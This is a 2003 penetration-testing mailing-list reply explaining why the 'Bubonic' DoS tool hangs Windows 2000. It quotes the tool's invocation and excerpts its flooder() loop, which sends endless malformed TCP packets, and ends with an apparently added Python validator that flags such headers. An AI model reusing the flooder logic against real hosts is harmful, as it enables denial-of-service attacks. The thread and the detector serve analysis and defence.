RE: Bubonic DoS tool

From: Yonatan Bokovza (Yonatanxpert.com)
Date: Tue Mar 11 2003 - 04:09:40 CST


> -----Original Message-----
> From: Indian Tiger [mailto:indiantigermailandnews.com]
> Sent: Thursday, February 06, 2003 18:43
> To: pen-testsecurityfocus.com
> Cc: silantioffline.com
> Subject: Bubonic DoS tool
>
>
> Hi All,
>
> I was testing the "Bubonic.c" lame DoS against Windows 2000 machines and
> certain versions of Linux in a test scenario over Linux 8.0. I have compiled
> its source code and am running its binary as follows:
> # ./bubonic 10.3.10.22 10.3.8.70 100 1000
> On executing the above command, there was no observable immediate effect,
> but the Hub was showing the collisions (which were the Red Steady). Ethereal
> shows the packets routed to the destination.
> But after executing the command the destination machine must be
> blocked/freeze, but it's not happening.

The code is very easy to understand. The "interesting" part is
in flooder(), my comments inline:

void flooder(void)
{
...
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = rand();
...
    packet.tcp.th_flags = random();   /* random flag combinations, e.g. SYN+FIN+RST */
    packet.tcp.th_win = 65535;
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = 0;            /* data offset 0: below the legal minimum of 5 words */
    packet.tcp.th_urp = random();
    packet.tcp.th_dport = random();   /* random destination port */
...
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = random();     /* random TCP length in the pseudo-header, so the checksum is bogus */
...
    for(i=0;;++i) {
...
       /* note the stray ';' -- send errors are silently ignored */
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
    }
}

To sum up and simplify, this sends TCP packets with a bad header.
As a result, my unpatched win2k's CPU graph stays over 90%
in the kernel, causing Albinoni to sound bad.

Best Regards,

Yonatan Bokovza
IT Security Consultant
Xpert Systems
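The malformed headers described in the reply (data offset of 0, random flag combinations, random urgent pointer and port) are easy to recognise on the wire. The following validator is an added example, not code from the thread or from bubonic.c: it unpacks a raw 20-byte TCP header and lists the reasons it is invalid. Field layout follows RFC 793; the two sample headers are constructed inline.

```python
"""Flag malformed TCP headers of the kind the bubonic flooder emits."""
import struct

MIN_DATA_OFFSET = 5  # 5 x 32-bit words = the 20-byte minimum TCP header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def parse_tcp_header(raw: bytes) -> dict:
    """Unpack the fixed 20-byte TCP header (network byte order)."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_res, flags, win, csum, urp = struct.unpack(
        "!HHIIBBHHH", raw[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "data_offset": off_res >> 4,  # header length in 32-bit words
        "flags": flags & 0x3F,        # the six classic flag bits only
        "window": win, "checksum": csum, "urg_ptr": urp,
    }


def header_problems(hdr: dict, segment_len: int) -> list:
    """Return human-readable reasons why a parsed header is invalid."""
    problems = []
    off = hdr["data_offset"]
    if off < MIN_DATA_OFFSET:
        problems.append(f"data offset {off} < 5 (header shorter than 20 bytes)")
    elif off * 4 > segment_len:
        problems.append("data offset points past the end of the segment")
    f = hdr["flags"]
    if f & SYN and f & FIN:
        problems.append("SYN and FIN set together")
    if f & SYN and f & RST:
        problems.append("SYN and RST set together")
    if f == 0:
        problems.append("no flags set")
    if not f & URG and hdr["urg_ptr"]:
        problems.append("urgent pointer set without URG")
    if hdr["dport"] == 0:
        problems.append("destination port 0")
    return problems


# Constructed samples: a normal SYN to port 80, and a bubonic-style header
# with th_off = 0, every flag set, a random urgent pointer and port.
GOOD_SYN = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, SYN, 65535, 0, 0)
BUBONIC_LIKE = struct.pack("!HHIIBBHHH", 12345, 4444, 0xDEADBEEF, 0, 0, 0x3F, 65535, 0, 0xBEEF)

if __name__ == "__main__":
    for name, raw in (("normal SYN", GOOD_SYN), ("bubonic-like", BUBONIC_LIKE)):
        print(name, header_problems(parse_tcp_header(raw), len(raw)))
```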
